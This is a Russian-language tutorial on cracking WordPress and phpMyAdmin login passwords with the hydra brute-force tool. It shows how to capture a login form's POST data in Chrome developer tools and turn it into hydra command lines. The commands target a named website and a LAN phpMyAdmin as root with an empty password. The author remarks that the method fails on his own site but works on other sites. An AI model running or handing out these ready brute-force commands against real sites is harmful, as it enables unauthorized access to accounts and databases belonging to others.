Взлом пароля для WordPress c hydra

Динамический анализ форм

Давайте теперь проведём динамический анализ формы. Я буду делать браузере Chrome (в Firefox также есть функционал для веб-разработчиков).

Переходим на сайт, который мы будем брутфорсить. Находим страницу авторизации http://notwebware.biz/wp-login.php. Теперь открываем в браузере Настройки и управление Google Chrome → Дополнительные инструменты → Инструменты разработчика

В них находим вкладку Network.

Вводим в форму любые учётные данные и нажимаем Войти.

Смотрим на нашу панель разработчика:

Нас интересует строка, которая содержит адрес страницы wp-login.php и метод отправки POST. Кликаем на неё. Там где Form Data выбираем view source:

Интересующая нас строка:

log=111111&pwd=222222&rememberme=forever&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebware.biz%2Fwp-admin%2F&testcookie=1

Я в качестве имени пользователя и пароля вводил 111111 и 222222, именно их мы и заменяем на ^USER^ и ^PASS^:

Так, передаваемая из формы строка готова:

log=^USER^&pwd=^PASS^&rememberme=forever&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebware.biz%2Fwp-admin%2F&testcookie=1

Тем где General, найдите строку с Request URL:

В моём случае это:

Request URL:http://webware.biz/wp-login.php

Т.е. данные передаются на страницу wp-login.php

Там же можно увидеть и метод:

Request Method:POST

Посмотрев на страницу видим, при неверных учётных данных в ответе присутствует слово «ОШИБКА». Тем не менее, не нужно сильно наедятся, что программа правильно будет работать с русскими буквами. Надежнее посмотреть HTML код и найти там что-нибудь характерное на латинице, например — login_error. Теперь можно составить окончательный запрос для брутфорса WordPress с hydra:

hydra -l 111111 -p 222222 http-post-form://notwebware.biz -m "/wp-login.php:log=^USER^&pwd=^PASS^&rememberme=forever&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebware.biz%2Fwp-admin%2F&testcookie=1:login_error"

Этот алгоритм является рабочим. Но на практике бывают исключения. Например, при попытке брутфорсить свой собственный сайт у меня появляется ошибка сервера 503.

Хотя на других сайтах вполне работает.

Взлом пароля для phpMyAdmin c hydra

Есть хорошая и плохая новости. Хорошая новость заключается в том, что я уже подготовил примерную строку для перебора паролей в phpMyAdmin:

hydra -l root -e n http-post-form://192.168.1.33 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"

Но есть и плохая новость. Эта строка никак не хотела работать на моём сервере в отношении самой последней версии phpMyAdmin. Я повозился с режимом отладки и выяснил, что причина в защите от ClickJacking, это сделано путём отключения фрейминга (возможности вставки страниц во фреймы). В коде phpMyAdmin так и написано:

/* Prevent against ClickJacking by disabling framing */
if (! $GLOBALS['cfg']['AllowThirdPartyFraming']) {
header(
'X-Frame-Options: DENY'
);
}

Т.е. в phpMyAdmin есть защита от брутфорсинга гидрой. Конечно, эта опция должна быть включена (так и есть по умолчанию) и сервер должен быть настроен соответствующим образом.

Т.е. налицо простая и эффективная защита от брутфорсинга (хотя, говорят, это можно обойти)...

Помощь по модулям http-get и http-post

Оба этих модуля требуют страницу для аутентификации

Пример: "/secret" или "http://bla.com/foo/bar" или "https://test.com:8080/members"